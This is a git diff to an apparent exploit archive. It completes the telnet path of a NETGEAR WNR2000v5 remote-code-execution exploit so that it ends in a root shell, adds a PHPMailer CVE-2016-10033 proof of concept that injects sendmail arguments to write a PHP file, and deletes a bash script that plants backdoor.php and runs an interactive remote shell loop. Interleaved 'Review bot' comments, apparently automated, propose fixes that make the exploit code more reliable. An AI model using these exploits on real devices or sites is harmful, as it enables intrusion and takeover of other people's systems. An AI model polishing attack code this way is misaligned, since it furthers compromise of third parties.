diff --git a/files.csv b/files.csv
index 042cf87d5..3a4279e43 100644
--- a/files.csv
+++ b/files.csv
@@ -36921,4 +36921,4 @@ id,file,description,date,author,platform,type,port
 40942,platforms/multiple/webapps/40942.py,"ntop-ng 2.5.160805 - Username Enumeration",2016-08-04,"Dolev Farhi",multiple,webapps,0
 40961,platforms/multiple/webapps/40961.py,"Apache mod_session_crypto - Padding Oracle",2016-12-23,"RedTeam Pentesting GmbH",multiple,webapps,0
 40966,platforms/php/webapps/40966.txt,"Joomla! Component Blog Calendar - SQL Injection",2016-12-26,X-Cisadane,php,webapps,0
-40968,platforms/php/webapps/40968.sh,"PHPMailer 5.2.17 - Remote Code Execution",2016-12-26,"Dawid Golunski",php,webapps,0
+40968,platforms/php/webapps/40968.php,"PHPMailer 5.2.17 - Remote Code Execution",2016-12-26,"Dawid Golunski",php,webapps,0
diff --git a/platforms/cgi/remote/40949.rb b/platforms/cgi/remote/40949.rb
index f61f500cb..8502f8411 100755
--- a/platforms/cgi/remote/40949.rb
+++ b/platforms/cgi/remote/40949.rb
@@ -1,6 +1,4 @@
 #
-# Source: https://raw.githubusercontent.com/pedrib/PoC/master/exploits/netgearPwn.rb
-#
 # Remote code execution in NETGEAR WNR2000v5
 # - by Pedro Ribeiro (pedrib@gmail.com) / Agile Information Security
 # Released on 20/12/2016
@@ -10,14 +8,14 @@
 #
 #
 # TODO:
-# - test default credentials first (with correct and incorrect password, see if auth can be used by default with incorrect password)
-# - finish telnetenable (get mac and send packet)
-# - finish timestamp regex (?)
 # - randomise payload
 
 require 'net/http'
 require 'uri'
 require 'time'
+require 'digest'
+require 'openssl'
+require 'socket'
 
 ####################
 # ported from https://git.uclibc.org/uClibc/tree/libc/stdlib/random.c
@@ -114,8 +112,8 @@ end
 #####################
 # Ruby code ported from https://github.com/insanid/netgear-telenetenable
 #
-def telnetenable (mac, username, password)
-  mac_pad = mac.gsub(':', '').upcase.ljust(0x10,"\x00")
+def telnetenable (username, password)
+  mac_pad = @mac.gsub(':', '').upcase.ljust(0x10,"\x00")
   username_pad = username.ljust(0x10, "\x00")
   password_pad = password.ljust(0x21, "\x00")
   cleartext = (mac_pad + username_pad + password_pad).ljust(0x70, "\x00")
@@ -130,8 +128,9 @@ def telnetenable (mac, username, password)
   cipher.key = secret_key
   cipher.padding = 0
   binary_data = (cipher.update(payload) << cipher.final)
-
-  binary_data.unpack('N*').pack('V*')
+
+  s = UDPSocket.new
+  s.send(binary_data.unpack('N*').pack('V*'), 0, @target.split(':')[0], 23)
 end
 
 #####################
@@ -169,8 +168,8 @@ def get_request(uri_str)
   uri = URI.parse(uri_str)
   http = Net::HTTP.new(uri.host, uri.port)
   #http.set_debug_output($stdout)
+  request = Net::HTTP::Get.new(uri.request_uri)
   request.basic_auth(USERNAME, PASSWORD)
-  request = Net::HTTP::Get.new(uri.request_uri)
   http.request(request)
 end
 
@@ -179,8 +178,8 @@ def post_request(uri_str, body)
   header = { 'Content-Type' => 'application/x-www-form-urlencoded' }
   http = Net::HTTP.new(uri.host, uri.port)
   #http.set_debug_output($stdout)
+  request = Net::HTTP::Post.new(uri.request_uri, header)
   request.basic_auth(USERNAME, PASSWORD)
-  request = Net::HTTP::Post.new(uri.request_uri, header)
   request.body = body
   http.request(request)
 end
@@ -246,9 +245,9 @@ end
 
 def get_auth_timestamp(mode)
   if mode == "bof"
-    uri_str = "lang_check.html"
+    uri_str = "http://#{@target}/lang_check.html"
   else
-    uri_str = "PWD_password.htm"
+    uri_str = "http://#{@target}/PWD_password.htm"
   end
   response = get_request(uri_str)
   if response.code == 401
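Review bot: The UDPSocket created in the second hunk (`s = UDPSocket.new`) is never closed, so the descriptor stays open until the interpreter exits or the object is collected, and the result of `s.send(...)` silently becomes the method's return value now that it is the last expression before `end`. The block form closes the socket deterministically and makes the discarded return explicit: `UDPSocket.open { |s| s.send(binary_data.unpack('N*').pack('V*'), 0, @target.split(':')[0], 23) }`. The only call site visible in this diff ignores the return value, so nothing else changes. telnetenable begins in the preceding hunk; only its tail is visible here.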
@@ -268,10 +267,10 @@ def got_shell
 end
 
 if ARGV.length < 2
-  puts "Usage: ./netgearPwn.rb [noreboot]"
+  puts "Usage: ./netgearPwn.rb > [noreboot]"
   puts "\tcheck: see if the target is vulnerable"
   puts "\tbof: run buffer overflow exploit on the target"
-  puts "\ttelnet: run telnet exploit on the target - DO NOT USE FOR NOW, DOESN'T WORK!"
+  puts "\ttelnet : run telnet exploit on the target, needs MAC address"
   puts "\tnoreboot: optional parameter - don't force a reboot on the target"
   exit(1)
 end
@@ -279,12 +278,23 @@ end
 @target = ARGV[0]
 mode = ARGV[1]
 
-if ARGV.length == 3 && ARGV[2] == "noreboot"
+if (ARGV.length > 2 && ARGV[2] == "noreboot") || (ARGV.length > 3 && ARGV[3] == "noreboot")
   reboot = false
 else
   reboot = true
 end
 
+if mode == "telnet"
+  if ARGV.length == 3
+    @mac = ARGV[2]
+  elsif ARGV.length == 4
+    @mac = ARGV[3]
+  else
+    puts "[-] telnet mode needs MAC address argument!"
+    exit(-1)
+  end
+end
+
 # Maximum time differential to try
 # Look 5000 seconds back for the timestamp with reboot
 # 500000 with no reboot
@@ -383,11 +393,11 @@ while true
       if response.code == "200"
         # this only occurs in the telnet case
         credentials = get_password
-        #telnetenable(mac, credentials[0], credentials[1])
-        #sleep 5
-        #got_shell
-        puts "Done! Got admin username #{credentials[0]} and password #{credentials[1]}"
-        puts "Use the telnetenable.py script (https://github.com/insanid/netgear-telenetenable) to enable telnet, and connect to port 23 to get a root shell!"
+        telnetenable(credentials[0], credentials[1])
+        sleep 5
+        got_shell
+        #puts "Done! Got admin username #{credentials[0]} and password #{credentials[1]}"
+        #puts "Use the telnetenable.py script (https://github.com/insanid/netgear-telenetenable) to enable telnet, and connect to port 23 to get a root shell!"
         exit(0)
       end
     rescue EOFError
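Review bot: The new usage line `puts "Usage: ./netgearPwn.rb > [noreboot]"` does not name the positional arguments the script reads (ARGV[0] as the target, ARGV[1] as the mode, and an extra argument for the MAC in telnet mode); the stray `>` suggests angle-bracketed placeholders were dropped, possibly by the rendering of this diff rather than by the commit itself. A bracket-free form survives either way: `puts "Usage: ./netgearPwn.rb TARGET MODE [MAC] [noreboot]"`. The `telnet :` line has the same gap, saying a MAC is needed without showing where it goes on the command line.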
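Review bot: In the new telnet branch of the second hunk, `@mac = ARGV[2]` is taken whenever exactly three arguments are present, so an invocation of the form `target telnet noreboot` both clears the reboot flag and uses the literal string `noreboot` as the MAC instead of reaching the usage error; the four-argument arm has the mirror problem when the flag comes last. Picking the first extra argument that is not the flag keeps the two parsers consistent: `@mac = ARGV[2..-1].find { |a| a != "noreboot" }`, followed by the existing `puts`/`exit(-1)` pair when `@mac.nil?`. The surrounding script continues outside this hunk.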
@@ -425,4 +435,4 @@ while true
 end
 
 # If we get here then the exploit failed
-puts "[-] Exploit finished. Failed to get a shell!"
\ No newline at end of file
+puts "[-] Exploit finished. Failed to get a shell!"
diff --git a/platforms/php/webapps/40968.php b/platforms/php/webapps/40968.php
new file mode 100755
index 000000000..44473975b
--- /dev/null
+++ b/platforms/php/webapps/40968.php
@@ -0,0 +1,79 @@
+
+09607 <<<
+09607 <<<
+09607 <<<
+09607 <<< --b1_cb4566aa51be9f090d9419163e492306--
+
+
+See the full advisory URL for details.
+
+*/
+
+
+// Attacker's input coming from untrusted source such as $_GET , $_POST etc.
+// For example from a Contact form
+
+$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php some"@email.com';
+$msg_body = "";
+
+// ------------------
+
+
+// mail() param injection via the vulnerability in PHPMailer
+
+require_once('class.phpmailer.php');
+$mail = new PHPMailer(); // defaults to using php "mail()"
+
+$mail->SetFrom($email_from, 'Client Name');
+
+$address = "customer_feedback@company-X.com";
+$mail->AddAddress($address, "Some User");
+
+$mail->Subject = "PHPMailer PoC Exploit CVE-2016-10033";
+$mail->MsgHTML($msg_body);
+
+if(!$mail->Send()) {
+  echo "Mailer Error: " . $mail->ErrorInfo;
+} else {
+  echo "Message sent!\n";
+}
+
+
+
+?>
+
+
diff --git a/platforms/php/webapps/40968.sh b/platforms/php/webapps/40968.sh
deleted file mode 100755
index 116d0bf9c..000000000
--- a/platforms/php/webapps/40968.sh
+++ /dev/null
@@ -1,27 +0,0 @@
-#!/bin/bash
-# CVE-2016-10033 exploit by opsxcq
-# https://github.com/opsxcq/exploit-CVE-2016-10033
-
-echo '[+] CVE-2016-10033 exploit by opsxcq'
-
-if [ -z "$1" ]
-then
-    echo '[-] Please inform an host as parameter'
-    exit -1
-fi
-
-host=$1
-
-echo '[+] Exploiting '$host
-
-curl -sq 'http://'$host -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzXJpHSq4mNy35tHe' --data-binary $'------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="action"\r\n\r\nsubmit\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="name"\r\n\r\n\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="email"\r\n\r\nvulnerables@ -OQueueDirectory=/tmp -X/www/backdoor.php\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="message"\r\n\r\nPwned\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe--\r\n' >/dev/null && echo '[+] Target exploited, acessing shell at http://'$host'/backdoor.php'
-
-cmd='whoami'
-while [ "$cmd" != 'exit' ]
-do
-    echo '[+] Running '$cmd
-    curl -sq http://$host/backdoor.php?cmd=$(echo -ne $cmd | base64) | grep '|' | head -n 1 | cut -d '|' -f 2 | base64 -d
-    echo
-    read -p 'RemoteShell> ' cmd
-done
-echo '[+] Exiting'
\ No newline at end of file